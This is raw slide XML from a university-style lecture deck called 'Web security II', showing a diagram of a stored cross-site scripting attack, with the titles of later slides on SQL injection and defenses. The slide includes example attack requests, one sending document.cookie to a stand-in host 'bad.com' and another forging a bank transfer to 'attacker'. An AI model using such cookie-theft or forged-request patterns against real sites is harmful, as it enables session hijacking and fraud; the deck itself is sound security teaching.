        <p:nvSpPr>
          <p:cNvPr id="810" name="Stored (or “persistent”) XSS attack…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="2857896"/>
            <a:ext cx="11099800" cy="3119197"/>
          </a:xfrm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AutoNum type="arabicPeriod"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Stored (or “persistent”) XSS attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740833" lvl="1" indent="-296333">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Attacker leaves script on the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bank.com</a:t>
            </a:r>
            <a:r>
              <a:t> server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740833" lvl="1" indent="-296333">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Server later unwittingly sends it to your browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740833" lvl="1" indent="-296333">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Browser executes it within same origin as </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>bank.com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tored XSS attac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Stored XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="815" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2902597" y="3845068"/>
            <a:ext cx="1365917" cy="2007902"/>
            <a:chOff x="287035" y="-55562"/>
            <a:chExt cx="1365915" cy="2007900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="813" name="Browser"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="287035" y="523587"/>
              <a:ext cx="1365916" cy="1428751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2200">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Browser</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="814" name="Client"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="373702" y="-55563"/>
              <a:ext cx="119258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>
                <a:defRPr sz="3400"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Client</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="816" name="bank.com"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8083697" y="5945783"/>
            <a:ext cx="1632104" cy="142875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  <a:hlinkClick r:id="rId4"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="817" name="bad.com"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8083697" y="2669589"/>
            <a:ext cx="1632104" cy="142875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22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bad.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="823" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8470982" y="4147548"/>
            <a:ext cx="1431607" cy="1797722"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1431606" cy="1797721"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="818" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="-1" y="-1"/>
              <a:ext cx="2" cy="179772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19" name="Inject malicious script"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="171056" y="562645"/>
              <a:ext cx="1260551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2000" b="1">
                  <a:solidFill>
                    <a:srgbClr val="06BC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Inject</a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:t>malicious</a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:t>script</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="822" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="180089" y="173555"/>
              <a:ext cx="353109" cy="444501"/>
              <a:chOff x="0" y="20637"/>
              <a:chExt cx="353108" cy="444500"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="820" name="Circle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="66333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1" name="1"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="38365" y="20637"/>
                <a:ext cx="228601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</p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="830" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4259517" y="4553303"/>
            <a:ext cx="3825981" cy="1708933"/>
            <a:chOff x="0" y="22382"/>
            <a:chExt cx="3825979" cy="1708932"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="824" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="242057"/>
              <a:ext cx="3825980" cy="148925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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="829" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="21528294">
              <a:off x="680027" y="46309"/>
              <a:ext cx="2307612" cy="1263612"/>
              <a:chOff x="6966" y="19178"/>
              <a:chExt cx="2307611" cy="1263610"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="825" name="Request content"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="1304020">
                <a:off x="360690" y="553785"/>
                <a:ext cx="1952753" cy="381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ctr">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:lvl1pPr algn="l">
                  <a:defRPr sz="2000"/>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:t>Request content</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="828" name="Group"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="6966" y="19178"/>
                <a:ext cx="458568" cy="529556"/>
                <a:chOff x="6966" y="19178"/>
                <a:chExt cx="458566" cy="529555"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="826" name="Circle"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="1300642">
                  <a:off x="59696" y="107401"/>
                  <a:ext cx="353109" cy="353109"/>
                </a:xfrm>
                <a:prstGeom prst="ellips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>
                    <a:defRPr sz="22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827" name="2"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="1300642">
                  <a:off x="78566" y="61705"/>
                  <a:ext cx="315369" cy="4445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ctr">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle>
                  <a:lvl1pPr>
                    <a:defRPr sz="2400">
                      <a:solidFill>
                        <a:srgbClr val="1333FF"/>
                      </a:solidFill>
                    </a:defRPr>
                  </a:lvl1pPr>
                </a:lstStyle>
                <a:p>
                  <a:r>
                    <a:t>2</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="836" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4243673" y="5043107"/>
            <a:ext cx="3857668" cy="1769764"/>
            <a:chOff x="-73260" y="-5996"/>
            <a:chExt cx="3857666" cy="1769762"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="831" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-73261" y="255740"/>
              <a:ext cx="3857668" cy="150802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32" name="Receive malicious script"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="1290205">
              <a:off x="636327" y="696192"/>
              <a:ext cx="285546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/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Receive malicious script</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="835" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="314865" y="-5997"/>
              <a:ext cx="458567" cy="529557"/>
              <a:chOff x="6966" y="19178"/>
              <a:chExt cx="458566" cy="529555"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="833" name="Circle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="1300642">
                <a:off x="59696" y="107401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4" name="3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="1300642">
                <a:off x="78566" y="61705"/>
                <a:ext cx="315369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  <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="841" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2010688" y="5597414"/>
            <a:ext cx="1980439" cy="2074689"/>
            <a:chOff x="0" y="20637"/>
            <a:chExt cx="1980438" cy="2074688"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="837" name="Execute the malicious script as though the…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="495125"/>
              <a:ext cx="1980439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/>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="2000"/>
              </a:pPr>
              <a:r>
                <a:t>Execute the</a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:t>malicious script</a:t>
              </a:r>
              <a:br/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as though the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server meant us</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="2000"/>
              </a:pPr>
              <a:r>
                <a:rPr i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rPr>
                <a:t>to run it</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="840" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="22781" y="20637"/>
              <a:ext cx="353109" cy="444501"/>
              <a:chOff x="0" y="20637"/>
              <a:chExt cx="353108" cy="444500"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="838" name="Circle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="66333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9" name="4"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="38365" y="20637"/>
                <a:ext cx="276378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rgbClr val="1333FF"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:t>4</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="847" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4279474" y="3219244"/>
            <a:ext cx="3835987" cy="1302796"/>
            <a:chOff x="0" y="67668"/>
            <a:chExt cx="3835986" cy="1302795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="842" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="0" y="197462"/>
              <a:ext cx="3835987" cy="117300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43" name="Steal valuable data"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20593436">
              <a:off x="615283" y="386130"/>
              <a:ext cx="226288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Steal valuable data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="846" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="525242">
              <a:off x="229540" y="691311"/>
              <a:ext cx="477570" cy="537511"/>
              <a:chOff x="8994" y="18574"/>
              <a:chExt cx="477568" cy="537510"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="844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5" name="5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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="853" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="2299948">
            <a:off x="4274516" y="5863403"/>
            <a:ext cx="3835987" cy="1354477"/>
            <a:chOff x="0" y="15987"/>
            <a:chExt cx="3835986" cy="1354476"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="848" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="0" y="197462"/>
              <a:ext cx="3835987" cy="1173002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2200"/>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="849" name="Perform attacker action"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20593436">
              <a:off x="415971" y="402997"/>
              <a:ext cx="273786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8100" tIns="38100" rIns="38100" bIns="38100" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="l">
                <a:defRPr sz="2000">
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Perform attacker action</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="852" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="525242">
              <a:off x="40336" y="776725"/>
              <a:ext cx="477569" cy="537511"/>
              <a:chOff x="8994" y="18574"/>
              <a:chExt cx="477568" cy="537510"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="850" name="Circle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20049694">
                <a:off x="71224" y="110775"/>
                <a:ext cx="353109" cy="353109"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="127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2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51" name="5"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20049694">
                <a:off x="90094" y="65079"/>
                <a:ext cx="31537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sp>
        <p:nvSpPr>
          <p:cNvPr id="854" name="GET http://bank.com/transfer?amt=9999&amp;to=attacker"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4063536" y="7759226"/>
            <a:ext cx="8307773" cy="4095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GET http://bank.com/transfer?amt=9999&amp;to=attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="855" name="GET http://bad.com/steal?c=document.cookie"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="646453" y="2706584"/>
            <a:ext cx="7134102" cy="409576"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFF200">
              <a:alpha val="28000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="3175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r>
              <a:t>GET http://bad.com/steal?c=document.cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="856" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8744094" y="7018497"/>
            <a:ext cx="311309" cy="284547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" grpId="3" animBg="1" advAuto="0"/>
      <p:bldP spid="823" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="830" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="836" grpId="5" animBg="1" advAuto="0"/>
      <p:bldP spid="841" grpId="6" animBg="1" advAuto="0"/>
      <p:bldP spid="847" grpId="9" animBg="1" advAuto="0"/>
      <p:bldP spid="853" grpId="7" animBg="1" advAuto="0"/>
      <p:bldP spid="854" grpId="8" animBg="1" advAuto="0"/>
      <p:bldP spid="855" grpId="10" animBg="1" advAuto="0"/>
      <p:bldP spid="856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9203</TotalTime>
  <Words>1975</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>372</Paragraphs>
  <Slides>44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White</vt:lpstr>
      <vt:lpstr>Web security II</vt:lpstr>
      <vt:lpstr>Dynamic web pages</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Javascript</vt:lpstr>
      <vt:lpstr>What could go wrong?</vt:lpstr>
      <vt:lpstr>Same Origin Policy</vt:lpstr>
      <vt:lpstr>Cross-site scripting (XSS)</vt:lpstr>
      <vt:lpstr>Two types of XSS</vt:lpstr>
      <vt:lpstr>Stored XSS attack</vt:lpstr>
      <vt:lpstr>Stored XSS Summary</vt:lpstr>
      <vt:lpstr>Your friend and mine, Samy</vt:lpstr>
      <vt:lpstr>Two types of XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS attack</vt:lpstr>
      <vt:lpstr>Echoed input</vt:lpstr>
      <vt:lpstr>Exploiting echoed input</vt:lpstr>
      <vt:lpstr>Reflected XSS Summary</vt:lpstr>
      <vt:lpstr>XSS Defense: Filter/Escape</vt:lpstr>
      <vt:lpstr>Did you find everything?</vt:lpstr>
      <vt:lpstr>Better defense: White list</vt:lpstr>
      <vt:lpstr>XSS vs. CSRF</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Server-side data</vt:lpstr>
      <vt:lpstr>SQL (Standard Query Language)</vt:lpstr>
      <vt:lpstr>Server-side code</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>SQL injection: Worse</vt:lpstr>
      <vt:lpstr>SQL injection: Even worse</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SQL injection attacks are common</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SQL injection countermeasures</vt:lpstr>
      <vt:lpstr>The underlying issue</vt:lpstr>
      <vt:lpstr>The underlying issue</vt:lpstr>
      <vt:lpstr>Prevention: Input validation</vt:lpstr>
      <vt:lpstr>Sanitization: Blacklisting</vt:lpstr>
      <vt:lpstr>Sanitization: Escaping</vt:lpstr>
      <vt:lpstr>Checking: Whitelisting</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Sanitization: Prepared statements</vt:lpstr>
      <vt:lpstr>Using prepared statements</vt:lpstr>
      <vt:lpstr>Additional mitigation</vt:lpstr>
      <vt:lpstr>Input validation, ad infinitum</vt:lpstr>
      <vt:lpstr>Takeaways: Verify before trust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security II</dc:title>
  <dc:creator>Dachman</dc:creator>
  <cp:lastModifiedBy>Dachman</cp:lastModifiedBy>
  <cp:revision>36</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-04T13:44:55Z</dcterms:modified>
</cp:coreProperties>
</file>